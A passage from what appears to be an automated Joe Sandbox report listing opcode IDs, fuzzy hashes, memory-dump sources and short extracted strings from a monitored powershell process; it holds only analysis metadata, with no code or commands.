                                                              • Opcode ID: c76f0cda7ada10b0cc3a3b2007c90d1e4c8d135fe778697a64482a86e108f8c8
                                                              • Instruction ID: 07ad0801c7ccf9451c5a39017a8c51ff363587a1abc2dd18937c1962a9b70616
                                                              • Opcode Fuzzy Hash: c76f0cda7ada10b0cc3a3b2007c90d1e4c8d135fe778697a64482a86e108f8c8
                                                              • Instruction Fuzzy Hash: 35B18AB0A002059FDB19CF68C955B9EBBB2AF88344F15C059D8056F395CB76EC86CFA1
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000004.00000002.2034509125.00000000071D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 071D0000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_4_2_71d0000_powershell.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID: 4'^q$4'^q$tLk
                                                              • API String ID: 0-3145036960
                                                              • Opcode ID: e1a6f4b760b0fb1611ac458e2398cc3207447776f639bef9399bb4cbb6566905
                                                              • Instruction ID: 0ac610a068da1b34544258ed1c2dc9fa843dce8f36dc3337e0db87ad929a192e
                                                              • Opcode Fuzzy Hash: e1a6f4b760b0fb1611ac458e2398cc3207447776f639bef9399bb4cbb6566905
                                                              • Instruction Fuzzy Hash: 54927A70A00214CFDB64DB58C855F5ABBB2BF89344F14C0A9D9099B396CB72ED82CF91
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000004.00000002.2002608933.0000000000A90000.00000040.00000800.00020000.00000000.sdmp, Offset: 00A90000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_4_2_a90000_powershell.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID: Hbq$$^q$$^q
                                                              • API String ID: 0-1611274095
                                                              • Opcode ID: f8a59c191915faa3338bcc34365d6b31fea816852adcb09eb698555c05e7522a
                                                              • Instruction ID: fb95272f79dad24910e084984103e3ad090eeee0b50f7c2060f67baf6b26b632
                                                              • Opcode Fuzzy Hash: f8a59c191915faa3338bcc34365d6b31fea816852adcb09eb698555c05e7522a
                                                              • Instruction Fuzzy Hash: F1121C34B002188FCF29DB74D9556AEBBF6AF89314F1444A9D40AAB361DF359E81CF81
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000004.00000002.2034509125.00000000071D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 071D0000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_4_2_71d0000_powershell.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID: 4'^q$4'^q$$^q
                                                              • API String ID: 0-953868773
                                                              • Opcode ID: 04045d7cc02acd576fbc550f6822041104ef942fabff433dacf2dc4a07bfb5c9
                                                              • Instruction ID: 89e493b656cc197a32e40255f357a0990a2094cd0d829199f05e82290e44cf4e
                                                              • Opcode Fuzzy Hash: 04045d7cc02acd576fbc550f6822041104ef942fabff433dacf2dc4a07bfb5c9
                                                              • Instruction Fuzzy Hash: B0A14AB0B043058FDB2A9A788814B6A7BE6AF85304F1584AAD441DF3D1DF36DC45CFA2
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000004.00000002.2034509125.00000000071D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 071D0000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_4_2_71d0000_powershell.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID: $^q$$^q$$^q
                                                              • API String ID: 0-831282457
                                                              • Opcode ID: 18c04a6d6b5911b072a7962661b0f6b0b76e36c3e947da4f4561f33a7833f88d
                                                              • Instruction ID: 7ade18a511a73a6c63e510dcca1fc7dee1efc5d0c571e0df99d5d049d79ab521
                                                              • Opcode Fuzzy Hash: 18c04a6d6b5911b072a7962661b0f6b0b76e36c3e947da4f4561f33a7833f88d
                                                              • Instruction Fuzzy Hash: F32129B270431AABDB3865699840BA7B69A5BC4714F34842A9505CF3C5DF36CC41CB61
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000004.00000002.2034509125.00000000071D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 071D0000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_4_2_71d0000_powershell.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID: 4'^q$tLk
                                                              • API String ID: 0-1558198336
                                                              • Opcode ID: a3c4a5130096b4fae0d1e74f83acb6d89b8b32070c4449211e0a45d4f4f7401b
                                                              • Instruction ID: 9f791c6d60eb911027b0f7ffb4a9b23b3bfd031cce6b64d9cac210904dd108b4
                                                              • Opcode Fuzzy Hash: a3c4a5130096b4fae0d1e74f83acb6d89b8b32070c4449211e0a45d4f4f7401b
                                                              • Instruction Fuzzy Hash: C4727C74A01214DFDB64CB18C851F5ABBB2BF89344F14C0A9D9199B396CB72ED82CF91
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000004.00000002.2034509125.00000000071D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 071D0000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_4_2_71d0000_powershell.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID: $^q$$^q
                                                              • API String ID: 0-355816377
                                                              • Opcode ID: aafec633ce6f06bafc71668487e283711de733d48d29cdc9961fe014f2d4f137
                                                              • Instruction ID: 774dcf9cad3a41fa1909a13867f08123bf507cb601cff9e22c5a7108d0a2456a
                                                              • Opcode Fuzzy Hash: aafec633ce6f06bafc71668487e283711de733d48d29cdc9961fe014f2d4f137
                                                              • Instruction Fuzzy Hash: C9218CB2704356ABEB3505398C40BE37F959F85754F35842AA544CB2C6CB2EDC81CB71
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000004.00000002.2034509125.00000000071D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 071D0000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_4_2_71d0000_powershell.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID: 4'^q
                                                              • API String ID: 0-1614139903
                                                              • Opcode ID: 41befbda6790b808df03b0cc22651355b2d80a82670afb12d87a64b24312eb62
                                                              • Instruction ID: 993b7eee5b8bb0fe64676b01b106ca3c929e2cba5556a0f1f525bd24c2f79a6f
                                                              • Opcode Fuzzy Hash: 41befbda6790b808df03b0cc22651355b2d80a82670afb12d87a64b24312eb62
                                                              • Instruction Fuzzy Hash: 22227E74A00214DFDB64CB58C851F9ABBB2BF85344F14C0A9D9199B396CB72ED82CF91
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000004.00000002.2034509125.00000000071D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 071D0000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_4_2_71d0000_powershell.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID: x.k
                                                              • API String ID: 0-3065921308
                                                              • Opcode ID: fedf685a3350bcb3dce23d2d257d8f846eabe07fd4ede16f6cc627efb83bb25e
                                                              • Instruction ID: d4157ac59d49466033feb28b64cee1e7925b6102ca8fa90aafb1ed26589caf08
                                                              • Opcode Fuzzy Hash: fedf685a3350bcb3dce23d2d257d8f846eabe07fd4ede16f6cc627efb83bb25e
                                                              • Instruction Fuzzy Hash: 1F918170B00208DFDB14DB68C955B9EBBB3AF89354F108468E5156F395CB72EC858FA1
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000004.00000002.2034509125.00000000071D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 071D0000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_4_2_71d0000_powershell.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID: x.k
                                                              • API String ID: 0-3065921308
                                                              • Opcode ID: 9395897dbd1b1406efe2a2a6cea33f59515040f355a29ef39d8c9e05210819e4
                                                              • Instruction ID: 9989c66d22b3d9cb4a33d9255a7aa84ca7995d9f2b338ab3bb4ccb3f17ab7758
                                                              • Opcode Fuzzy Hash: 9395897dbd1b1406efe2a2a6cea33f59515040f355a29ef39d8c9e05210819e4
                                                              • Instruction Fuzzy Hash: 6A91BFB0A00204EFDB15CB68C951B9EBBB3AF8A314F118459E4156F391CB76EC85CFA1
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000004.00000002.2034509125.00000000071D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 071D0000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_4_2_71d0000_powershell.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID: 4'^q
                                                              • API String ID: 0-1614139903
                                                              • Opcode ID: 90951e683f9807b5e1cfa7aa66286c08211d2051da6cb89f044bcccd20affe2f
                                                              • Instruction ID: be400393c1a5acbebf18266684a7ba63dcd1a22d14366a94f04a86a49165e95f
                                                              • Opcode Fuzzy Hash: 90951e683f9807b5e1cfa7aa66286c08211d2051da6cb89f044bcccd20affe2f
                                                              • Instruction Fuzzy Hash: 9441E7B0B042028FDB29CE28C594FAD7BE6AB95644F1984A5D405EB2D1DB36DD40CFA2
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000004.00000002.2034509125.00000000071D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 071D0000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_4_2_71d0000_powershell.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID: x.k
                                                              • API String ID: 0-3065921308
                                                              • Opcode ID: 39a4573e034cbc57b2293f106085847214384c5b3eee05851cf4d06e062a3fd6
                                                              • Instruction ID: ff265d5249691fe13fcc07a15d7fef5c12884e0e78e0f1a7d60ddaa5c91415ae
                                                              • Opcode Fuzzy Hash: 39a4573e034cbc57b2293f106085847214384c5b3eee05851cf4d06e062a3fd6
                                                              • Instruction Fuzzy Hash: 2D319030B412149BDB04AB74C956FAE7AA7EF84304F15C468E9066F3D5CFB69C418BA1
                                                              Memory Dump Source
                                                              • Source File: 00000004.00000002.2002608933.0000000000A90000.00000040.00000800.00020000.00000000.sdmp, Offset: 00A90000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_4_2_a90000_powershell.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID:
                                                              • API String ID:
                                                              • Opcode ID: 4420e8b0b00b7a4abeeaaa84a5fe8ec1b4b8746423e0a375e73b60a7ddb417e6
                                                              • Instruction ID: bbc0fe4c5674951d537deb9f66c03976cf627103934449dcc15e88863cd2fcc4
                                                              • Opcode Fuzzy Hash: 4420e8b0b00b7a4abeeaaa84a5fe8ec1b4b8746423e0a375e73b60a7ddb417e6
                                                              • Instruction Fuzzy Hash: DBC17C31B00208AFDF15DFA8D944A9EBBF2FF85310F118569E406AB365DB75AD89CB40
                                                              Memory Dump Source
                                                              • Source File: 00000004.00000002.2002608933.0000000000A90000.00000040.00000800.00020000.00000000.sdmp, Offset: 00A90000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_4_2_a90000_powershell.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID:
                                                              • API String ID:
                                                              • Opcode ID: 228aeb5ea84fabd301a3de8030ea0007932750c8d52cd004b2584ea06b0d7849
                                                              • Instruction ID: 5a9a63869a8285e37d25272882e8f67053af3975fd95a08817c7ef1abafe21be
                                                              • Opcode Fuzzy Hash: 228aeb5ea84fabd301a3de8030ea0007932750c8d52cd004b2584ea06b0d7849
                                                              • Instruction Fuzzy Hash: CEB13D70F00219DFDF10CFA9D98579EBBF2AF88314F248129E815EB255EB749845CB91
                                                              Memory Dump Source
                                                              • Source File: 00000004.00000002.2002608933.0000000000A90000.00000040.00000800.00020000.00000000.sdmp, Offset: 00A90000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_4_2_a90000_powershell.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID:
                                                              • API String ID:
                                                              • Opcode ID: cb57fb4c18718ae66de05222b37d4508f237ef8932cf2c7259409a9450eb5d82
                                                              • Instruction ID: 038c473808691f777b80381452676461bfeb16aad96671fd1b335597b1d12cdb
                                                              • Opcode Fuzzy Hash: cb57fb4c18718ae66de05222b37d4508f237ef8932cf2c7259409a9450eb5d82
                                                              • Instruction Fuzzy Hash: B9B13971E00209DFDF10CFA9D9857ADBBF1AF48314F248139E859EB294EB749885CB81
                                                              Memory Dump Source
                                                              • Source File: 00000004.00000002.2002608933.0000000000A90000.00000040.00000800.00020000.00000000.sdmp, Offset: 00A90000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_4_2_a90000_powershell.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID:
                                                              • API String ID:
                                                              • Opcode ID: cdef770781db5725766d9782e9d5a25c010e6e3f92de36169f6853efb6d0dfff
                                                              • Instruction ID: 5130ad6a165cf625b10dff1656275a3134250311a9a8d339df5c6d102927d227
                                                              • Opcode Fuzzy Hash: cdef770781db5725766d9782e9d5a25c010e6e3f92de36169f6853efb6d0dfff
                                                              • Instruction Fuzzy Hash: B4717C34A05244DFCB15DB64D8849ADBBF2FF8A350F1984A9E405AB362CB39EC85CB50
                                                              Memory Dump Source
                                                              • Source File: 00000004.00000002.2002608933.0000000000A90000.00000040.00000800.00020000.00000000.sdmp, Offset: 00A90000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_4_2_a90000_powershell.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID:
                                                              • API String ID:
                                                              • Opcode ID: d2aa1ebccb41a01e3474d31682399a280e9e8b628ba49b9d92e11173712bb7c0
                                                              • Instruction ID: 792df499edacfd0172325d60ca8bb8de337aecad92d7dd12cc2be42798cb4384
                                                              • Opcode Fuzzy Hash: d2aa1ebccb41a01e3474d31682399a280e9e8b628ba49b9d92e11173712bb7c0
                                                              • Instruction Fuzzy Hash: D471AF30A01209DFCB14DF68D980A9EBBF6FF89354F14856AE415DB761DB71AC46CB80
                                                              Memory Dump Source
                                                              • Source File: 00000004.00000002.2002608933.0000000000A90000.00000040.00000800.00020000.00000000.sdmp, Offset: 00A90000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_4_2_a90000_powershell.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID:
                                                              • API String ID:
                                                              • Opcode ID: 495afb206e0198398496bca1a9b4857de8ba413d59e4a6a9215d31c283c94f68
                                                              • Instruction ID: cdfc7a432e8bde4c5af9a1120a28dd7e098f28a0e015e04caff247f00f3a3c4a
                                                              • Opcode Fuzzy Hash: 495afb206e0198398496bca1a9b4857de8ba413d59e4a6a9215d31c283c94f68
                                                              • Instruction Fuzzy Hash: 28714D34A00208EFDF14DFA8D944BAEBBF6FF88344F148469D415AB660DB75AD86CB41
                                                              Memory Dump Source
                                                              • Source File: 00000004.00000002.2002608933.0000000000A90000.00000040.00000800.00020000.00000000.sdmp, Offset: 00A90000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_4_2_a90000_powershell.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID:
                                                              • API String ID:
                                                              • Opcode ID: 806fdaeeda67ad1d2961e3d7d65ec476bb9d16581f5aa106a2999cf5e21d64b1
                                                              • Instruction ID: 63d6af7ac9c904cce2a2ed27508f960e79113276f917f8ce267c0a6ed84554f1
                                                              • Opcode Fuzzy Hash: 806fdaeeda67ad1d2961e3d7d65ec476bb9d16581f5aa106a2999cf5e21d64b1
                                                              • Instruction Fuzzy Hash: B77139B0E00249DFDF10DFA9C98579EBBF2AF88714F248129E419E7264EB749845CF91
                                                              Memory Dump Source
                                                              • Source File: 00000004.00000002.2002608933.0000000000A90000.00000040.00000800.00020000.00000000.sdmp, Offset: 00A90000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_4_2_a90000_powershell.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID:
                                                              • API String ID:
                                                              • Opcode ID: 62bfe5628df6041fd044bf7a5cde0c3179c58ad8432926b955ec6f0e4bb9b11b
                                                              • Instruction ID: 90cc83bfd8a866a80e7816151be273316b4e498a31404f03f87afa4feecde69e
                                                              • Opcode Fuzzy Hash: 62bfe5628df6041fd044bf7a5cde0c3179c58ad8432926b955ec6f0e4bb9b11b
                                                              • Instruction Fuzzy Hash: F6714BB0E00249DFDF14DFA9C98179EBBF2AF88314F148129E419E7264EB749845CF91
                                                              Memory Dump Source
                                                              • Source File: 00000004.00000002.2002608933.0000000000A90000.00000040.00000800.00020000.00000000.sdmp, Offset: 00A90000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_4_2_a90000_powershell.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID:
                                                              • API String ID:
                                                              • Opcode ID: 8dcf357855bcb855fd5ca6452d84d6d7169fcdad0cbc84c17fcbbb51998dedb8
                                                              • Instruction ID: f22164ee6d806d1e2db654f4ac81d6b32e5d8d4fb8d533b9ebe976ae324bd185
                                                              • Opcode Fuzzy Hash: 8dcf357855bcb855fd5ca6452d84d6d7169fcdad0cbc84c17fcbbb51998dedb8
                                                              • Instruction Fuzzy Hash: C5616F76A00258AFCF05CF98D484A9DBBF1FF49320F158159E855AB752C731ED82CB90
                                                              Memory Dump Source
                                                              • Source File: 00000004.00000002.2034509125.00000000071D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 071D0000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_4_2_71d0000_powershell.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID:
                                                              • API String ID:
                                                              • Opcode ID: ef5e71bdf265603e09a3cf0b13748976be898c78b55b9909f1236dcd9e43db1c
                                                              • Instruction ID: 351e7704f16a040b2feebfacd4dc2ccbc24443d5c17cc7c957f4f056bb9356c1
                                                              • Opcode Fuzzy Hash: ef5e71bdf265603e09a3cf0b13748976be898c78b55b9909f1236dcd9e43db1c
                                                              • Instruction Fuzzy Hash: 86416EB17442108BCB16E678441169ABFB69FC1318B15C4AAD5029F396DF73CD42CBE1
                                                              Memory Dump Source
                                                              • Source File: 00000004.00000002.2002608933.0000000000A90000.00000040.00000800.00020000.00000000.sdmp, Offset: 00A90000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_4_2_a90000_powershell.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID:
                                                              • API String ID:
                                                              • Opcode ID: c0146c239f75174b3ec5ed5bce5b0023672e1405713029fa27969a8401776510
                                                              • Instruction ID: c3e1e76386816d1e77d3c537b81f434c94312da4dbe78e490c14b5b63f955199
                                                              • Opcode Fuzzy Hash: c0146c239f75174b3ec5ed5bce5b0023672e1405713029fa27969a8401776510
                                                              • Instruction Fuzzy Hash: 84510576A01218AFCF14CFA8D484A9DFBF1AF58310F248169E815AB352C731EE81CB90
                                                              Memory Dump Source
                                                              • Source File: 00000004.00000002.2002608933.0000000000A90000.00000040.00000800.00020000.00000000.sdmp, Offset: 00A90000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_4_2_a90000_powershell.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID:
                                                              • API String ID:
                                                              • Opcode ID: 3fec23102e5e9542d6d1e89cf9888887afa4fb9a2feb9ce7f8d101695a7d346b
                                                              • Instruction ID: 55a74e380ff9aacdc64a38261c933a3e7d0ca5ed5ebe3b132a92f29ffa5e4353
                                                              • Opcode Fuzzy Hash: 3fec23102e5e9542d6d1e89cf9888887afa4fb9a2feb9ce7f8d101695a7d346b
                                                              • Instruction Fuzzy Hash: 26416D39B003009FDB14DBA8C958AAEBBF6AF8A750F14446CE506EB7A0DF359C41DB50
                                                              Memory Dump Source
                                                              • Source File: 00000004.00000002.2002608933.0000000000A90000.00000040.00000800.00020000.00000000.sdmp, Offset: 00A90000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_4_2_a90000_powershell.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID:
                                                              • API String ID:
                                                              • Opcode ID: d867b94d27d8e1d227e45fdeadcadcb2a9582cfc31f7c0d0aef7ee0ab9e85fad
                                                              • Instruction ID: fd3213d7dc5084911f1ab3b57583b55e0c1a4c5b83bf681ecfdff853ae28bbbb
                                                              • Opcode Fuzzy Hash: d867b94d27d8e1d227e45fdeadcadcb2a9582cfc31f7c0d0aef7ee0ab9e85fad
                                                              • Instruction Fuzzy Hash: 8C414B70A00218DFDF14DFA9C984A9EBBF2FF89344F15846DD405AB6A4DB75AC46CB80
                                                              Memory Dump Source
                                                              • Source File: 00000004.00000002.2034509125.00000000071D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 071D0000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_4_2_71d0000_powershell.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID:
                                                              • API String ID:
                                                              • Opcode ID: 3d18f57422c0c086d517594e45fa322921d5a64d9937606f36ea3b10b39cef5c
                                                              • Instruction ID: 24545333fa8b576b4adffa0e0c8028d9efe198ed978e7938a996a74907bc9627
                                                              • Opcode Fuzzy Hash: 3d18f57422c0c086d517594e45fa322921d5a64d9937606f36ea3b10b39cef5c
                                                              • Instruction Fuzzy Hash: EF217C7130031AABDB28566A8844B7BBAC69BCC705F24883DA506EF2C0DF76CD408B60
                                                              Memory Dump Source
                                                              • Source File: 00000004.00000002.2002608933.0000000000A90000.00000040.00000800.00020000.00000000.sdmp, Offset: 00A90000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_4_2_a90000_powershell.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID:
                                                              • API String ID:
                                                              • Opcode ID: 6941ea5f21ae995154779f7cdbef49410d89108351648452d38a50c20c7316a1
                                                              • Instruction ID: 9de3dc68da82e85215da3f02dca4f57e524f9f92f1495312aab0e1af0447b5bb
                                                              • Opcode Fuzzy Hash: 6941ea5f21ae995154779f7cdbef49410d89108351648452d38a50c20c7316a1
                                                              • Instruction Fuzzy Hash: 3531F834B002288FCF25DB64C9556EEB7F2AF89314F1544E9D40AAB252DF359E92CF81
                                                              Memory Dump Source
                                                              • Source File: 00000004.00000002.2034509125.00000000071D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 071D0000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_4_2_71d0000_powershell.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID:
                                                              • API String ID:
                                                              • Opcode ID: 7527a19aabe2e0cbfe907d61f8720dc88cb0bcd6863503f0dc23697e1f746733
                                                              • Instruction ID: a09e90e84c012d558df9663608644dc2adfe80c77cd1367bb85a274c208ab4e5
                                                              • Opcode Fuzzy Hash: 7527a19aabe2e0cbfe907d61f8720dc88cb0bcd6863503f0dc23697e1f746733
                                                              • Instruction Fuzzy Hash: 6021BBB17043496BDB250A6A8814BB77FD59F8D704F28882AA408EF2D1DB79DD44CB70
                                                              Memory Dump Source
                                                              • Source File: 00000004.00000002.2002608933.0000000000A90000.00000040.00000800.00020000.00000000.sdmp, Offset: 00A90000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_4_2_a90000_powershell.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID:
                                                              • API String ID:
                                                              • Opcode ID: 138957ef279aee30b28c1a76dcd524292347a2df4d4c2bbcf085b3d9b14b74a5
                                                              • Instruction ID: a77c5190d040c591e59f432ef4954eb65e4921c643a3231fe94a89f075c317a1
                                                              • Opcode Fuzzy Hash: 138957ef279aee30b28c1a76dcd524292347a2df4d4c2bbcf085b3d9b14b74a5
                                                              • Instruction Fuzzy Hash: 1A11D0746001049FCB05CB68C890AAEBBB1FF5D320B248295D569977A1C735EC43CB94
                                                              Memory Dump Source
                                                              • Source File: 00000004.00000002.2034509125.00000000071D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 071D0000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_4_2_71d0000_powershell.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID:
                                                              • API String ID:
                                                              • Opcode ID: 76a8b0e1c11a167a1c76cb35d6ea46ef0ad9da38feb20ff296b896f956e7fa38
                                                              • Instruction ID: 94a9f96948f77f3e68f3bb207096796c22d1b37a6891112a74416dff51fba8b4
                                                              • Opcode Fuzzy Hash: 76a8b0e1c11a167a1c76cb35d6ea46ef0ad9da38feb20ff296b896f956e7fa38
                                                              • Instruction Fuzzy Hash: 2801767A32031A9BC7355AAAD40017BB7DADBCA622F14C47FD449CB290DB32CD49CB60
                                                              Memory Dump Source
                                                              • Source File: 00000004.00000002.2002608933.0000000000A90000.00000040.00000800.00020000.00000000.sdmp, Offset: 00A90000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_4_2_a90000_powershell.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID:
                                                              • API String ID:
                                                              • Opcode ID: e3babcd68466e45505b91e07e4b058d06f813e5cf488cde06a0f7b5dda21136b
                                                              • Instruction ID: f48e1496aa776760187b740816284c1d3e886324b6216dd2e805911878186d40
                                                              • Opcode Fuzzy Hash: e3babcd68466e45505b91e07e4b058d06f813e5cf488cde06a0f7b5dda21136b
                                                              • Instruction Fuzzy Hash: 4411CD30E10249CFDF24DB98E9997ECB7F2AB04319F24123AC111F6191AB745CCACB56
                                                              Memory Dump Source
                                                              • Source File: 00000004.00000002.2002608933.0000000000A90000.00000040.00000800.00020000.00000000.sdmp, Offset: 00A90000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_4_2_a90000_powershell.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID:
                                                              • API String ID:
                                                              • Opcode ID: 58fdbd446dbe2d9395875a497001845d733f2a112a470386858e75279e8dfc72
                                                              • Instruction ID: 1adeba858ef6cd5e6b3f2e9c4807c899935c9b8a37c67636432b0cf9d57b8dab
                                                              • Opcode Fuzzy Hash: 58fdbd446dbe2d9395875a497001845d733f2a112a470386858e75279e8dfc72
                                                              • Instruction Fuzzy Hash: EF01A774B402149FCB04DF98D4806EDF7B1FF9D300B208159D51AA7321CA35EC038B50
                                                              Memory Dump Source
                                                              • Source File: 00000004.00000002.2002300364.0000000000A1D000.00000040.00000800.00020000.00000000.sdmp, Offset: 00A1D000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_4_2_a1d000_powershell.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID:
                                                              • API String ID:
                                                              • Opcode ID: 21dba22616f4e3c25937bf6da71521d998a9e0ce60de9940f8d6d20943b29aa7
                                                              • Instruction ID: daba9c32032a223069ae0cff23c42b34291c5b74aca07b72b8e1d51e5d541567
                                                              • Opcode Fuzzy Hash: 21dba22616f4e3c25937bf6da71521d998a9e0ce60de9940f8d6d20943b29aa7
                                                              • Instruction Fuzzy Hash: 4001DB714093449AE7104B29CDC47A7FFE8DF49324F18C529ED4A5B246C679DDC1C6B1
                                                              Memory Dump Source
                                                              • Source File: 00000004.00000002.2002300364.0000000000A1D000.00000040.00000800.00020000.00000000.sdmp, Offset: 00A1D000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_4_2_a1d000_powershell.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID:
                                                              • API String ID:
                                                              • Opcode ID: c3b50aafba5cbc442b0153d47e03be82a35be39ae9d2f6533a1f5b13bc9069b3
                                                              • Instruction ID: ec2ff793d474362683752374e553a1a997239402a0b27589c754797679627a9b
                                                              • Opcode Fuzzy Hash: c3b50aafba5cbc442b0153d47e03be82a35be39ae9d2f6533a1f5b13bc9069b3
                                                              • Instruction Fuzzy Hash: 00F0C272405344AEE7108B1AC9C4BA3FFE8EB55334F18C45AED495E286C2799C80CAB0
                                                              Memory Dump Source
                                                              • Source File: 00000004.00000002.2002608933.0000000000A90000.00000040.00000800.00020000.00000000.sdmp, Offset: 00A90000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_4_2_a90000_powershell.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID:
                                                              • API String ID:
                                                              • Opcode ID: 4645df0275dfe6fa49d03eb683eef679d3280eabfec414f3dcb3bf66bdd1f343
                                                              • Instruction ID: 82b4a5ecbb8eafe6769b2478d777d05039f1a35f7252bf832825c1d3d25458ef
                                                              • Opcode Fuzzy Hash: 4645df0275dfe6fa49d03eb683eef679d3280eabfec414f3dcb3bf66bdd1f343
                                                              • Instruction Fuzzy Hash: 0BF0DA35A001059FCF15CF9DD990AEEF7B1FF88324F208159E515A72A1C736AD52CB50
                                                              Memory Dump Source
                                                              • Source File: 00000004.00000002.2002608933.0000000000A90000.00000040.00000800.00020000.00000000.sdmp, Offset: 00A90000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_4_2_a90000_powershell.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID:
                                                              • API String ID:
                                                              • Opcode ID: 88796576ee28f406dd20b4d7705f360b7fbfa4238be7264981eeb0638a497b65
